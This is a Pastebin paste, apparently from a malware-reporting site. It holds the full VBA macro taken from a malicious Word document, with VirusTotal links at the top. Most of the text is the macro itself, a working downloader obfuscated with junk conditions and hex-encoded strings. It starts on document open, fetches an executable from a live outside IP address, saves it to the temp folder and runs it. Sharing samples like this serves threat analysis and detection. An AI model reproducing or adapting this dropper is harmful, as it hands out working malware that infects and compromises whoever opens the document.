Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- hi from techhelplist.com
- macro from malicious .doc:
- https://www.virustotal.com/en/file/da7ce3828873c467ecf7d51c34bc354ae7947192d36075d571bebb4b1298ea5a/analysis/
- tl;dr:
- downloads : http://79.137.227.123:8080/get1/get1.php == test.exe
- https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/
- ---------------------------------------------------------
- Rem Attribute VBA_ModuleType=VBADocumentModule
- Option VBASupport 1
- Function kcdygwrfbiu(ByVal yjgkqifjhuh As String, ByVal wyribcufvdf As String) As Boolean
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- Dim ybkppsihihv As Object, ytzewczgyac As Long, dffgyvolwmr As Long, sleabtnazmz() As Byte
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 198146 = 198146 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 7839 < 72 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("ydsyzxcl64")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("ykqxxxyl2193") = Len("appahzmy") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- Set ybkppsihihv = CreateObject("msxml2.xmlhttp")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- ybkppsihihv.Open "GET", yjgkqifjhuh, False
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 521349 = 521349 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 8893 < 54 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("likijweg67")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("pllhkrlc3166") = Len("sxxznekr") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- ybkppsihihv.send "VVhjk"
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 376139 = 376139 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 4393 < 36 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("ezhdcheq72")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("pkmsyove5253") = Len("tsljbgsj") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- sleabtnazmz = ybkppsihihv.responsebody
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 715735 = 715735 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 4641 < 12 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("ryjrhqnx53")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("dygrzarq8814") = Len("gojjpnrl") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- dffgyvolwmr = FreeFile
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- Open wyribcufvdf For Binary As #dffgyvolwmr
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 729374 = 729374 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 4942 < 43 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("nnyvcjng26")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("fnfymeib5882") = Len("olspfiwd") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- Put #dffgyvolwmr, , sleabtnazmz
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 935867 = 935867 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 7842 < 34 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("lkhqhnue85")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("ekdpzjqk1116") = Len("rwhcqgpb") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- Close #dffgyvolwmr
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 767893 = 767893 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 7329 < 99 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("xvbnvbmi21")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("rfebukjb1584") = Len("vuaenced") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 642238 = 642238 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 9112 < 66 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("awvnauwt56")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("kynuzhsf1962") = Len("lpemqgqm") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- Set bikhbouivbl = CreateObject("shell.application")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- bikhbouivbl.Open Environ("temp") & "\VYEJIUNSXLI.exe"
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 863523 = 863523 + 1 Then End
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If 8277 < 29 Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("tczpuufm31")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- If Len("ddyihaps3541") = Len("mafrfkwq") Then
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- MsgBox ("error !!!")
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End If
- '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
- End Function
- Sub auto_open()
- If 342198 = 342198 + 1 Then End
- If 6121 < 36 Then
- MsgBox ("pwnlbmeg41")
- End If
- If Len("ayzaarmc1384") = Len("zprgozle") Then
- MsgBox ("error !!!")
- End If
- vmmtnyfyoid
- End Sub
- Sub autoopen()
- If 579373 = 579373 + 1 Then End
- If 2541 < 28 Then
- MsgBox ("nvgsfxxv92")
- End If
- If Len("nefeixyc5714") = Len("wxsiaalq") Then
- MsgBox ("error !!!")
- End If
- auto_open
- End Sub
- Sub workbook_open()
- If 881586 = 881586 + 1 Then End
- If 8712 < 53 Then
- MsgBox ("gmlldavd95")
- End If
- If Len("shniernf9662") = Len("dlzwszbm") Then
- MsgBox ("error !!!")
- End If
- auto_open
- End Sub
- Sub vmmtnyfyoid()
- If 393732 = 393732 + 1 Then End
- If 3669 < 39 Then
- MsgBox (hextostring(Chr$(55) & Chr$(65) & Chr$(52) & Chr$(56) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(53) & Chr$(51) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(69) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(52)))
- End If
- If Len(hextostring(Chr$(52) & Chr$(70) & Chr$(55) & Chr$(57) & Chr$(53) & Chr$(65) & Chr$(52) & Chr$(51) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(69) & Chr$(55) & Chr$(56) & Chr$(52) & Chr$(67) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(57))) = Len(hextostring(Chr$(52) & Chr$(53) & Chr$(54) & Chr$(50) & Chr$(54) & Chr$(49) & Chr$(53) & Chr$(65) & Chr$(52) & Chr$(54) & Chr$(55) & Chr$(57) & Chr$(53) & Chr$(48) & Chr$(55) & Chr$(53))) Then
- MsgBox (hextostring(Chr$(52) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(50) & Chr$(48) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49)))
- End If
- fdgjhhibjkl7gik = hextostring(Chr$(54) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(48) & Chr$(51) & Chr$(65) & Chr$(50) & Chr$(70) & Chr$(50) & Chr$(70) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(57) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(49) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(49) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(65) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(48) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(48) & Chr$(50) & Chr$(70) & Chr$(54) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(51) & Chr$(49) & Chr$(50) & Chr$(70) & Chr$(54) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(51) & Chr$(49) & Chr$(50) & Chr$(69) & Chr$(55) & Chr$(48) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(48))
- If 485913 = 485913 + 1 Then End
- If 7649 < 42 Then
- MsgBox (hextostring(Chr$(52) & Chr$(54) & Chr$(53) & Chr$(56) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(70) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(68) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(49)))
- End If
- If Len(hextostring(Chr$(55) & Chr$(52) & Chr$(55) & Chr$(57) & Chr$(54) & Chr$(56) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(54) & Chr$(67) & Chr$(53) & Chr$(48) & Chr$(53) & Chr$(65) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(57))) = Len(hextostring(Chr$(54) & Chr$(67) & Chr$(54) & Chr$(55) & Chr$(52) & Chr$(70) & Chr$(52) & Chr$(66) & Chr$(54) & Chr$(67) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(51))) Then
- MsgBox (hextostring(Chr$(52) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(50) & Chr$(48) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49)))
- End If
- kcdygwrfbiu fdgjhhibjkl7gik, Environ(hextostring(Chr$(53) & Chr$(52) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(68) & Chr$(53) & Chr$(48))) & hextostring(Chr$(53) & Chr$(67) & Chr$(53) & Chr$(54) & Chr$(53) & Chr$(57) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(65) & Chr$(52) & Chr$(57) & Chr$(53) & Chr$(53) & Chr$(52) & Chr$(69) & Chr$(53) & Chr$(51) & Chr$(53) & Chr$(56) & Chr$(52) & Chr$(67) & Chr$(52) & Chr$(57) & Chr$(50) & Chr$(69) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(54) & Chr$(53))
- End Sub
- Public Function hextostring(ByVal nhcqwfgej As String) As String
- Dim nuzmlbfhz As String
- Dim ogqyauxcpbviwij As String
- Dim fgofrw As Long
- For fgofrw = 1 To Len(nhcqwfgej) Step 2
- If 987234 = 987234 + 1 Then End
- If 7639 < 69 Then
- MsgBox ("dibkwffc53")
- End If
- If Len("aiuvlbwo8571") = Len("xayestix") Then
- MsgBox ("error !!!")
- End If
- nuzmlbfhz = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(nhcqwfgej, fgofrw, 2)))
- If 243388 = 243388 + 1 Then End
- If 2439 < 55 Then
- MsgBox ("avaykopy31")
- End If
- If Len("bmiwoqdu3279") = Len("dzzkdvfa") Then
- MsgBox ("error !!!")
- End If
- ogqyauxcpbviwij = ogqyauxcpbviwij & nuzmlbfhz
- Next fgofrw
- If 987435 = 987435 + 1 Then End
- If 7623 < 69 Then
- MsgBox ("arrvwigd53")
- End If
- If Len("apefhibs8563") = Len("wzalodsn") Then
- MsgBox ("error !!!")
- End If
- hextostring = ogqyauxcpbviwij
- End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement